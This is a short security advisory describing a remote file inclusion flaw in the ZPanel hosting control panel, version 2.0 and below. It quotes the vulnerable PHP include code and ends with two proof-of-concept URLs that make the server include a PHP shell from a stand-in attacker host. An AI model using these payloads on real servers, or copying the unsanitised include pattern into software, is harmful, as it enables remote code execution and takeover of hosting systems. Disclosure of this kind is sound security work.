zpanel.txt

`ZPanel Remote File Inclusion  
ZPanel is a hosting control panel used by web hosts to give their users a friendly interface   
to manage any aspects of their hosting or account information.  
ZPanel is an open source project and runs on Windows and Linux.  
zpanel tested on :  
Windows : 2000 Adv. Server,2000 Server,2003 Ent. Server,XP Professional  
Linux : SuSE 9.1, 9.2 ,Debian,Fedora 2,FreeBSD 4.9, 5.2.1,Mandrake 9.1, 9.2,Redhat 7.9, 9  
  
  
http://www.thezpanel.com  
http://www.zee-way.com  
http://forge.novell.com/modules/xfmod/project/?zpanel  
  
Credit:  
The information has been provided by Hamid Ebadi  
The original article can be found at : http://www.bugtraq.ir/articles/advisory/ZPanel-Remote-File-Inclusion/2  
  
Vulnerable Systems:  
Version: ZPanel 2.0 (and below)  
(also tested on ZPanel-v25-BETA11 )  
  
  
Description:  
Input passed to the "page" parameter in "zpanel.php" and "body" parameter in "templates/ZPanelV2/template.php" isn't properly verified, before it is used to include files.  
This can be exploited to include arbitrary files from remote and local resources.  
  
Vulnerable Code :  
  
http://[host]/ZPanel/zpanel.php  
  
// zpanel.php line : 21  
if (!isset($_GET['page'])){  
$body = "main.php";  
}else{  
$body = $_GET['page'] . ".php";  
}  
// ...  
  
// line : 38  
//Loading template  
$templatefolder = $row_Config['template'];  
include('templates/'.$templatefolder.'/template.php');  
  
  
  
http://[host]/ZPanel/templates/ZPanelV2/template.php  
  
// template.php  
// line : 63   
  
<?php include ($body); ?>  
  
  
  
  
POC exploit :  
http://[host]/ZPanel/zpanel.php?page=http://attacker/phpshell.txt?  
http://[host]/ZPanel/templates/ZPanelV2/template.php?body=http://attacker/phpshell.txt?  
  
# http://www.bugtraq.ir`